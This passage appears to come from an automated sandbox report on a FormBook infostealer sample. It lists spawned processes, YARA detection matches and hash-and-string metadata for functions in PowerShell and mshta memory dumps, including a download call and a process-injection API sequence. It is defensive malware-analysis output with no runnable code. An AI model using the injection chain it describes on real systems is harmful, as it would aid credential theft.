Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:21:23
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:21:52
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x510000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 06E20FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2124308589.0000000006E20000.00000010.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6e20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: def9bd6877600cb01ec13cd4755d560ff765d3f672b123fe8efe7b88b82cbc49
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06E20FC7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2124308589.0000000006E20000.00000010.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6e20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: def9bd6877600cb01ec13cd4755d560ff765d3f672b123fe8efe7b88b82cbc49
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06E20FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2124308589.0000000006E20000.00000010.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6e20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: def9bd6877600cb01ec13cd4755d560ff765d3f672b123fe8efe7b88b82cbc49
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06E20FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2124308589.0000000006E20000.00000010.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6e20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: def9bd6877600cb01ec13cd4755d560ff765d3f672b123fe8efe7b88b82cbc49
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 7092, Parent PID: 3500COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	57
Total number of Limit Nodes:	8

Executed Functions

Function 04637A18 Relevance: 1.9, APIs: 1, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2228676251.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1309a9f0b18d0c35ba8494ddb3ff702279809efa647588610c4776a3f7b0100
Instruction ID: 3294ccc13db40096923150c2f00bb1e5516cddace803672af100eef20598055a
Opcode Fuzzy Hash: e1309a9f0b18d0c35ba8494ddb3ff702279809efa647588610c4776a3f7b0100
Instruction Fuzzy Hash: 2DE108B4A00249EFDB05CF98D584A9EBBB6FF48311F24C159E805AB365D735ED41CB90

Function 070A1F40 Relevance: 6.8, Strings: 5, Instructions: 580
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 070A227E
\, xrefs: 070A232C
4']q, xrefs: 070A23E2
4']q, xrefs: 070A2288
4']q, xrefs: 070A23D8

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$\
API String ID: 0-1117529060
Opcode ID: 18e7bc5660c4405917156a09633a3b33a7fbe50fc94890089231a1cce2e39fd5
Instruction ID: 9b4d21395e56e7ad3af2869ba6de5929b16d3bfd363b72c4e91f13557fbcd1b0
Opcode Fuzzy Hash: 18e7bc5660c4405917156a09633a3b33a7fbe50fc94890089231a1cce2e39fd5
Instruction Fuzzy Hash: CE125AB1B04315AFCB558BA8881076EBBE6FFD2310F5485BAD905CF291DB31C946C7A2

Function 070A4610 Relevance: 2.9, Strings: 2, Instructions: 438
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP]q, xrefs: 070A4648
tP]q, xrefs: 070A4652

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: 0d4af6eef8dd027fa3db78776d4cb3a0187de7268a92d37ce48d7295cc445996
Instruction ID: d2866e4c880cc24c88a094e767047ddf391682c2738d03aaca0ab395813ffd74
Opcode Fuzzy Hash: 0d4af6eef8dd027fa3db78776d4cb3a0187de7268a92d37ce48d7295cc445996
Instruction Fuzzy Hash: 71F1F378B00245AFDB149FACC450A6EBBF6EFC9710F248969F9059B350DAB1DC41CB91

Function 070A04F8 Relevance: 2.7, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP]q, xrefs: 070A057E
tP]q, xrefs: 070A058A

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: f852d4baed40f9584067eb541d2ffc19fb64fb1d696dc249c82ccef55cbcc31d
Instruction ID: 01a72eaf6205620e765b80cd92d848a245619cf8e1bcb04fb31b6eca1305ecab
Opcode Fuzzy Hash: f852d4baed40f9584067eb541d2ffc19fb64fb1d696dc249c82ccef55cbcc31d
Instruction Fuzzy Hash: A55125B1B04318AFCB149BB8885072ABBE6AFC5B10F14C95AE945DB291DA71DC05C7A2

Function 04631C00 Relevance: 1.6, APIs: 1, Instructions: 68
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04637E99

Memory Dump Source

Source File: 00000003.00000002.2228676251.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4630000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 562a5b8edd0ba086cdc980d75c6685d19beed252f709fa616179050e7dbed2d4
Instruction ID: 1eb6769840629d08e1f9af6da30bf012a123736b946e8f210bc652c4a1331316
Opcode Fuzzy Hash: 562a5b8edd0ba086cdc980d75c6685d19beed252f709fa616179050e7dbed2d4
Instruction Fuzzy Hash: 2121E4B5D01659DFCB04CF9AD984ADEFBB4FF48311F10852AE918A7210D374AA54CFA4

Function 070A45F4 Relevance: 1.5, Strings: 1, Instructions: 239
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP]q, xrefs: 070A4648

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: tP]q
API String ID: 0-2175968468
Opcode ID: 7ee34d47a39c7f1c6dad469108677724db6e2cdbd58ae468087fff40812293a0
Instruction ID: 5f7f83703d62b5c323a989a333341f1ad2a45e4512991639793017f94b534d1a
Opcode Fuzzy Hash: 7ee34d47a39c7f1c6dad469108677724db6e2cdbd58ae468087fff40812293a0
Instruction Fuzzy Hash: B491D0B8A00285ABDB14CF9CC440B6DBBF2FF89710F248659E9159B350DBB2DC41CB91

Function 070A1F24 Relevance: 1.4, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<, xrefs: 070A1F24

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: e223a777cf71c452698f9efa1a895f47530ab90c6ea6c7f5ae7667fef196d0b5
Instruction ID: bddd5191583c90b1888deb2d66e7a307200e85984b5feb19784e9446a32f7d4b
Opcode Fuzzy Hash: e223a777cf71c452698f9efa1a895f47530ab90c6ea6c7f5ae7667fef196d0b5
Instruction Fuzzy Hash: 8841D5B0A18302AFDB608FA48D40A6D7BF1EFD1354F5982B5D604DF292D731D981CBA2

Function 028ED006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227594379.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_28ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c372124326ec22bdccae0611c153da70a72b4506abf1ce9cabb3cb0479d7fb
Instruction ID: 75c62e7bc506ba1872a1cc2d71c8b24461821beb141134b0ce19daef45fc24fc
Opcode Fuzzy Hash: 70c372124326ec22bdccae0611c153da70a72b4506abf1ce9cabb3cb0479d7fb
Instruction Fuzzy Hash: CF0169764093C09FDB124B258884752BFB8EF43224F0D84DBE9888F2A7C2695C49C772

Function 028ED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227594379.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_28ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f193aa8c42cbecb349e9c499ba3be763069301227d37d01b7882e0bc9e8f625
Instruction ID: ff54c3300a3ff3bc4a3bf64c05d524544f9e3af5c08dc35c4305a8110bad99a2
Opcode Fuzzy Hash: 2f193aa8c42cbecb349e9c499ba3be763069301227d37d01b7882e0bc9e8f625
Instruction Fuzzy Hash: 0001F7394053449ADB208A15C984B67BF9CEF47324F1CC429ED5A8A246C379984AC6B1

Non-executed Functions

Function 070A15A8 Relevance: 10.5, Strings: 8, Instructions: 487COMMON

Download Yara Rule

Strings

4']q, xrefs: 070A1819
H, xrefs: 070A1A2C
$]q, xrefs: 070A15EC
$]q, xrefs: 070A15BA
tP]q, xrefs: 070A1625
$]q, xrefs: 070A15E0
4']q, xrefs: 070A180F
tP]q, xrefs: 070A1631

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$H$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-3502447447
Opcode ID: 0bfd6039658082ee79cae43990273cd4d292b3d712860ba080d734f9e04fe95c
Instruction ID: e3f09748c238e5fb8927f7c191ff29f1218ae91f6ac71026cc71279eb1fe1124
Opcode Fuzzy Hash: 0bfd6039658082ee79cae43990273cd4d292b3d712860ba080d734f9e04fe95c
Instruction Fuzzy Hash: 1DF17971B04319AFDB508BACD8106AEBBF6EFC6320F14856AC455CB251DB31CD45C7A2

Function 070A1280 Relevance: 7.7, Strings: 6, Instructions: 247COMMON

Download Yara Rule

Strings

tP]q, xrefs: 070A149C
X, xrefs: 070A13D8
4']q, xrefs: 070A132A
4']q, xrefs: 070A1336
tP]q, xrefs: 070A14A8
$]q, xrefs: 070A140C

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$X$tP]q$tP]q$$]q
API String ID: 0-3683015779
Opcode ID: ed6c73ad9a60ea995ecf831680e184ae811b6d5520c4e53464f1d8a400bde46b
Instruction ID: 68da6d47ee73319473440c56b7ebdd651e684e62fd1e75fe1a3210ca9f2a1107
Opcode Fuzzy Hash: ed6c73ad9a60ea995ecf831680e184ae811b6d5520c4e53464f1d8a400bde46b
Instruction Fuzzy Hash: D08159B1B04309EFCB658BE8881076ABFF5AF82711F14866BD545CB291DA35C845C7A2

Function 070A3D30 Relevance: 6.5, Strings: 5, Instructions: 269COMMON

Download Yara Rule

Strings

4']q, xrefs: 070A3F83
4']q, xrefs: 070A3DE2
4']q, xrefs: 070A3DD6
P, xrefs: 070A4040
4']q, xrefs: 070A3F77

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$P
API String ID: 0-1261072335
Opcode ID: b58e9f593d6e5f1f638f300cd2bf53f7256455c0e8166246de5bf02219aca52c
Instruction ID: 64d98b56552d91d211ed5033ad1de217e0902e2af26a20612a632bf193c3cd44
Opcode Fuzzy Hash: b58e9f593d6e5f1f638f300cd2bf53f7256455c0e8166246de5bf02219aca52c
Instruction Fuzzy Hash: 259113B0B04346EFCB549FB8D4506AAFBF6EF86210F2485AAD455CB252DB31C845CB92

Function 070A3550 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 070A35B8
$]q, xrefs: 070A35AC
$]q, xrefs: 070A3562
$]q, xrefs: 070A357E

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 2e188b12d7db178ee8b0ef2863e0ae8a818bca0e3fc70e02249c1c6e7beaf826
Instruction ID: 68c82db1185e619480becb72f73f2bef8ed5354be1b105b9e05d8dbe9d750bb1
Opcode Fuzzy Hash: 2e188b12d7db178ee8b0ef2863e0ae8a818bca0e3fc70e02249c1c6e7beaf826
Instruction Fuzzy Hash: 642147B17143067BDF6896FE8840B3AEADA9FC1715F64C92A9905CB385CD32C801C361

Function 070A3530 Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

$]q, xrefs: 070A35AC
$]q, xrefs: 070A3562
,, xrefs: 070A3530
$]q, xrefs: 070A357E

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: ,$$]q$$]q$$]q
API String ID: 0-1163176480
Opcode ID: a298b07d42c40c715ddc3d5f963516aade6f6d23453b339316a1943d25ce5eb4
Instruction ID: c1726fe477597a757d3356f6b42e29fb73d31b3fcc0c292e42f20a050dfaf8c2
Opcode Fuzzy Hash: a298b07d42c40c715ddc3d5f963516aade6f6d23453b339316a1943d25ce5eb4
Instruction Fuzzy Hash: E9217CB16183817BEF6546B94C40B26FFE59F92720F28C567E984C72D2D575C844C731

Function 070A1588 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

$]q, xrefs: 070A15BA
H, xrefs: 070A1588
tP]q, xrefs: 070A1625
$]q, xrefs: 070A15E0

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: H$tP]q$$]q$$]q
API String ID: 0-1112551327
Opcode ID: 2cc7193fc5468187a8f5c499c6d191522a26f81aa6c8d46797341e0fdce10bc2
Instruction ID: 1fd1b8eebdcbaa80b3068d43f0369ad0ef5c93579554e204b418f79f3f4492bf
Opcode Fuzzy Hash: 2cc7193fc5468187a8f5c499c6d191522a26f81aa6c8d46797341e0fdce10bc2
Instruction Fuzzy Hash: 762103B1609359EFCB658FA8C800A65BBF4AF46720F1D469BE955CF2A2C735DC00CB91

Function 070A0080 Relevance: 5.0, Strings: 4, Instructions: 44COMMON

Download Yara Rule

Strings

4']q, xrefs: 070A00EB
4']q, xrefs: 070A00F7
$]q, xrefs: 070A00CA
$]q, xrefs: 070A00D6

Memory Dump Source

Source File: 00000003.00000002.2236790617.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: a2f50c927cd07e5d043df8caf8db2fe1a04b6bfcb917212c0e9b4378f69a1e03
Instruction ID: 08862c05389d2ac9d5ab6a42ea383f4a60f472207dff55fc283b89fcf6be59cc
Opcode Fuzzy Hash: a2f50c927cd07e5d043df8caf8db2fe1a04b6bfcb917212c0e9b4378f69a1e03
Instruction Fuzzy Hash: 4C018F6070D38A6FC72A52A818305296FB65FC3560F6A4AEBC0D1DF2A7E9194D05C367

Analysis Process: powershell.exePID: 6084, Parent PID: 2928COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	8

Executed Functions

Function 028CB870 Relevance: 2.8, Strings: 2, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 028CB8AF
$]q, xrefs: 028CB896

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 974ad5121e55f91b38b1e6a496dd718727ed4b06f0727666ec324d1650a4f270
Instruction ID: 4d4f197e113935cde5a350bef736b51702a848513d23d72795c80952c7d3ec61
Opcode Fuzzy Hash: 974ad5121e55f91b38b1e6a496dd718727ed4b06f0727666ec324d1650a4f270
Instruction Fuzzy Hash: BC917F38F006189BDB08AF78985567E7BA7BFC8B14F14892DD446E7288DF34DC128796

Function 028C7638 Relevance: .8, Instructions: 804COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ff3a4d2a97a15f6369ab160e6f8e3c27f09399137e4b01c6528c74cc1f152ec
Instruction ID: a2f4589217d822fa742a93158fc68e6db96728b72596a7dfa7511bb9c18c9894
Opcode Fuzzy Hash: 0ff3a4d2a97a15f6369ab160e6f8e3c27f09399137e4b01c6528c74cc1f152ec
Instruction Fuzzy Hash: 84720B38A002198FDB54EF74D8586ADBBF6AB88305F1084A9D91AD7394DF348D86CF61

Function 06F509C8 Relevance: 14.1, Strings: 11, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06F50CA1
4']q, xrefs: 06F50B0F
$]q, xrefs: 06F50A86
$]q, xrefs: 06F50AE8
$]q, xrefs: 06F50ADC
$]q, xrefs: 06F50C3F
$]q, xrefs: 06F50C83
$]q, xrefs: 06F50C95
$]q, xrefs: 06F50C5B
4']q, xrefs: 06F50B03
$]q, xrefs: 06F50C77

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-66262967
Opcode ID: ee77b65b984139d13b4eb05a9dafb9781a232ecd1c307ec4b4fd08fa38f16386
Instruction ID: b12f2963a29cf1487cead192f2a85b0599dbf7d8246358c6dfd30fccee60fcc2
Opcode Fuzzy Hash: ee77b65b984139d13b4eb05a9dafb9781a232ecd1c307ec4b4fd08fa38f16386
Instruction Fuzzy Hash: F6C15731F043099FDBA49A79885076ABBE6EFC1310F26846ADE45CB251DF35CD41C7A1

Function 06F513A0 Relevance: 12.9, Strings: 10, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06F515EB
4']q, xrefs: 06F514AE
$]q, xrefs: 06F51613
4']q, xrefs: 06F51638
$]q, xrefs: 06F51450
$]q, xrefs: 06F513F7
$]q, xrefs: 06F51607
4']q, xrefs: 06F514BA
$]q, xrefs: 06F5145C
4']q, xrefs: 06F5162C

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-267665775
Opcode ID: bfbec6d115a9c3d47fc3794b886c782df184f72b2425232fee785a08aa471e30
Instruction ID: c0c012e6dc83cf98a59c4280afab718da495a1c42954ad6497300538988a6a0b
Opcode Fuzzy Hash: bfbec6d115a9c3d47fc3794b886c782df184f72b2425232fee785a08aa471e30
Instruction Fuzzy Hash: 1EB14731F043059FDB69CE6CC85077ABBE6AF82610F1A846ADE45CB251DB31ED42C7A1

Function 06F51F18 Relevance: 8.0, Strings: 6, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 06F521A4
4']q, xrefs: 06F52198
(o]q, xrefs: 06F52376
(o]q, xrefs: 06F52366
4']q, xrefs: 06F51FF2
4']q, xrefs: 06F51FFE

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$4']q$4']q$4']q$4']q
API String ID: 0-3265970930
Opcode ID: 3c2fd7ec0c9ad0bed1329f7dd808ba58842a35aaedac102440cdcef824ee4f0a
Instruction ID: e9439a60715c25f72b45f0b8e7f333221c24471922a3df75191fca88a4c0bca7
Opcode Fuzzy Hash: 3c2fd7ec0c9ad0bed1329f7dd808ba58842a35aaedac102440cdcef824ee4f0a
Instruction Fuzzy Hash: B0F14431F04208DFDB548F68C8547AABBA2FF85310F16C66AEA558B251DB31CE45CBA1

Function 028CBDD0 Relevance: 6.9, APIs: 4, Instructions: 871memoryprocessthreadCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 028CC20C
VirtualAllocEx.KERNEL32(?,00000001,00000000,?,?), ref: 028CC300

Part of subcall function 028C75C8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1701789D,00000000,?,?,?,?,00000000,?,028CC363,?,00000000,?), ref: 028CD254

ResumeThread.KERNELBASE(?), ref: 028CC6AA
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 028CCB64

Memory Dump Source

Source File: 00000007.00000002.2501281660.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28c0000_powershell.jbxd

Similarity

API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
String ID:
API String ID: 4270437565-0
Opcode ID: 45775886c30762c5bb7d2ccd765b6f422eec3f87b27ca05d900d2853858c9eef
Instruction ID: 3ae139ac5936ae6b3be4cd5956326b720ffaf6850295c73283466cfb6be2ae49
Opcode Fuzzy Hash: 45775886c30762c5bb7d2ccd765b6f422eec3f87b27ca05d900d2853858c9eef
Instruction Fuzzy Hash: 3C821878A00259CFDB24DF68D944BAAB7F2BB44304F2485AED45EEB651DB30E984CF50

Function 06F509A9 Relevance: 3.9, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06F50A86
$]q, xrefs: 06F50ADC
4']q, xrefs: 06F50B03

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$$]q$$]q
API String ID: 0-3019551829
Opcode ID: 04dbe4ada19efb975ad780d5ae5edee79810960cca62e4dcb208df09b8b64e5f
Instruction ID: f3ed45371f0d50c998fdfb5620944d566b65aba8a11bffbed18f02c1290bbee2
Opcode Fuzzy Hash: 04dbe4ada19efb975ad780d5ae5edee79810960cca62e4dcb208df09b8b64e5f
Instruction Fuzzy Hash: C5414731E04349AFEBA59E24C85076A7BB1AF91344F568567DE00CB1A2EF34CE80C7A1

Function 06F51381 Relevance: 3.9, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 06F514AE
$]q, xrefs: 06F51450
$]q, xrefs: 06F513F7

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$$]q$$]q
API String ID: 0-3019551829
Opcode ID: 5fd51b5e35c8327fa5b04e8b4bebc1d883dcea2e3a897d6fea90552e08cab3f1
Instruction ID: 1806cdbf5b66115cac1d0de4cd39726bcf026395cdc83cb7332d684dc7dbb7ea
Opcode Fuzzy Hash: 5fd51b5e35c8327fa5b04e8b4bebc1d883dcea2e3a897d6fea90552e08cab3f1
Instruction Fuzzy Hash: 8531F231E04305DFDBA6CF1985817A67BF1BF42624F1B85A6DE848B152D334ED81CBA1

Function 06F51598 Relevance: 3.8, Strings: 3, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06F515EB
$]q, xrefs: 06F51607
4']q, xrefs: 06F5162C

Memory Dump Source

Source File: 00000007.00000002.2539411201.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$$]q$$]q
API String ID: 0-3019551829
